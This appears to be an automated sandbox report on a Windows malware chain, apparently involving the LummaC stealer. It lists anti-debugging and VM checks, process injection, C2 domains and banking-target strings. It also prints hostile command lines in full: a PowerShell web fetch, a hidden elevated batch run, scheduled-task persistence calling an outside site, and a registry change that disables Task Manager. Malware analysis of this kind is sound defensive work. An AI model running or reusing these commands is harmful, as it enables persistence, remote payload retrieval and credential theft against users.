Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.16.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.16.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.16.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.16.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.16.dr	Binary or memory string: VMware VMCI Bus Device
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: Amcache.hve.16.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: ldr.exe, 00000020.00000003.1770335175.0000000001351000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.16.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.16.dr	Binary or memory string: VMware20,1hbin@
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.16.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: svchost.exe, 00000006.00000002.3153958903.00000200B962B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 1Vkf7silOj.exe, 00000001.00000002.1583733816.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3792010122.000001BA8B42B000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000008.00000002.1556968219.0000000001812000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3915719731.0000000005F32000.00000004.00000020.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3804687281.0000000001159000.00000004.00000020.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000002.2109884741.0000027E58E98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Explorers.exe, 0000002A.00000002.1954319592.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe`,
Source: Amcache.hve.16.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: svchost.exe, 00000011.00000002.3795065695.000001496FA13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: Amcache.hve.16.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: aspnet_regiis.exe, 00000036.00000003.2039854269.0000000023287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: svhosts.exe, 00000029.00000002.3845689462.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^

Source: C:\Users\user\AppData\Local\Temp\7.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\1Vkf7silOj.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe

System information queried: CodeIntegrityInformation

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\7.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\Temp\7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\7.exe

Code function: 9_2_05620B32 rdtsc

9_2_05620B32

Source: C:\Users\user\Desktop\1Vkf7silOj.exe

Code function: 1_2_05837328 LdrInitializeThunk,

1_2_05837328

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe

Code function: 12_2_0015DE43 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_0015DE43

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Code function: 18_2_0061BEA9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

18_2_0061BEA9

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006E643B mov eax, dword ptr fs:[00000030h]	10_2_006E643B
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 10_2_006EA1A2 mov eax, dword ptr fs:[00000030h]	10_2_006EA1A2
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 12_2_001651C2 mov eax, dword ptr fs:[00000030h]	12_2_001651C2
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 12_2_00161F18 mov ecx, dword ptr fs:[00000030h]	12_2_00161F18
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0062A1A2 mov eax, dword ptr fs:[00000030h]	18_2_0062A1A2
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0062643B mov eax, dword ptr fs:[00000030h]	18_2_0062643B

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe

Code function: 12_2_0016D31C GetProcessHeap,

12_2_0016D31C

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 12_2_0015A082 SetUnhandledExceptionFilter,	12_2_0015A082
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 12_2_0015A1E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_0015A1E0
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 12_2_0015DE43 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0015DE43
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 12_2_00159F26 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00159F26
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0060D0ED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_0060D0ED
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_006269BE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_006269BE
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0060DAB5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_0060DAB5
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0060DC1A SetUnhandledExceptionFilter,	18_2_0060DC1A

Source: C:\Users\user\Desktop\1Vkf7silOj.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2610000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe

Code function: 12_2_023D018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

12_2_023D018D

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe

Thread created: unknown EIP: 86519A0

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2610000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: 6.exe, 00000008.00000002.1556184199.0000000000DDD000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: facilitycoursedw.shop
Source: 6.exe, 00000008.00000002.1556184199.0000000000DDD000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: doughtdrillyksow.shop
Source: 6.exe, 00000008.00000002.1556184199.0000000000DDD000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: disappointcredisotw.shop
Source: 6.exe, 00000008.00000002.1556184199.0000000000DDD000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: bargainnygroandjwk.shop
Source: 6.exe, 00000008.00000002.1556184199.0000000000DDD000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: injurypiggyoewirog.shop
Source: 6.exe, 00000008.00000002.1556184199.0000000000DDD000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: leafcalfconflcitw.shop
Source: 6.exe, 00000008.00000002.1556184199.0000000000DDD000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: computerexcudesp.shop
Source: 6.exe, 00000008.00000002.1556184199.0000000000DDD000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: publicitycharetew.shop
Source: O3B6wY7ZkFhh.exe, 00000031.00000003.2101234382.0000027E7E470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: proffyrobharborye.xyz
Source: O3B6wY7ZkFhh.exe, 00000031.00000003.2101234382.0000027E7E470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: panameradovkews.xyz
Source: O3B6wY7ZkFhh.exe, 00000031.00000003.2101234382.0000027E7E470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: aplointexhausdh.xyz
Source: O3B6wY7ZkFhh.exe, 00000031.00000003.2101234382.0000027E7E470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: manufactiredowreachhd.xyz
Source: O3B6wY7ZkFhh.exe, 00000031.00000003.2101234382.0000027E7E470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: slammyslideplanntywks.xyz
Source: O3B6wY7ZkFhh.exe, 00000031.00000003.2101234382.0000027E7E470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: depositybounceddwk.xyz
Source: O3B6wY7ZkFhh.exe, 00000031.00000003.2101234382.0000027E7E470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: exertcreatedadnndjw.xyzz
Source: O3B6wY7ZkFhh.exe, 00000031.00000003.2101234382.0000027E7E470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: compilecoppydkewsw.xyz

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Section loaded: NULL target: unknown protection: read write
Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe	Section loaded: NULL target: unknown protection: execute and read

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 728008
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58E000
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 590000
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E19008
Source: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2610000
Source: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2574008
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 41C000
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 424000
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 637000
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: B93008

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1lLub	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process created: C:\Users\user\AppData\Local\Temp\6.exe "C:\Users\user~1\AppData\Local\Temp\6.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Process created: C:\Users\user\AppData\Local\Temp\7.exe "C:\Users\user~1\AppData\Local\Temp\7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user~1\AppData\Local\Temp\8254624243\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000035001\gold.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe "C:\Users\user~1\AppData\Local\Temp\1000064001\NewLatest.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe "C:\Users\user~1\AppData\Local\Temp\1000091001\Installer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe "C:\Users\user~1\AppData\Local\Temp\1000108001\ldr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe "C:\Users\user~1\AppData\Local\Temp\1000109001\alex5555555.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000110001\123.exe "C:\Users\user~1\AppData\Local\Temp\1000110001\123.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe "C:\Users\user~1\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe "C:\Users\user~1\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7752 -ip 7752
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7752 -s 320
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 8560 -ip 8560
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8560 -s 284
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Process created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe "C:\Users\user~1\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000020001\1.exe "C:\Users\user~1\AppData\Local\Temp\1000020001\1.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	Process created: C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe "C:\Users\user~1\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\install.bat"
Source: C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe "C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe "C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Source: Explorers.exe, 0000002A.00000002.1954319592.00000000028C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: Explorers.exe, 0000002A.00000002.1954319592.00000000028C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow
Source: axplong.exe, axplong.exe, 0000000B.00000002.1682107353.0000000000891000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: e6Program Manager

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Code function: 10_2_006CD2E8 cpuid

10_2_006CD2E8

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_0016D0BA
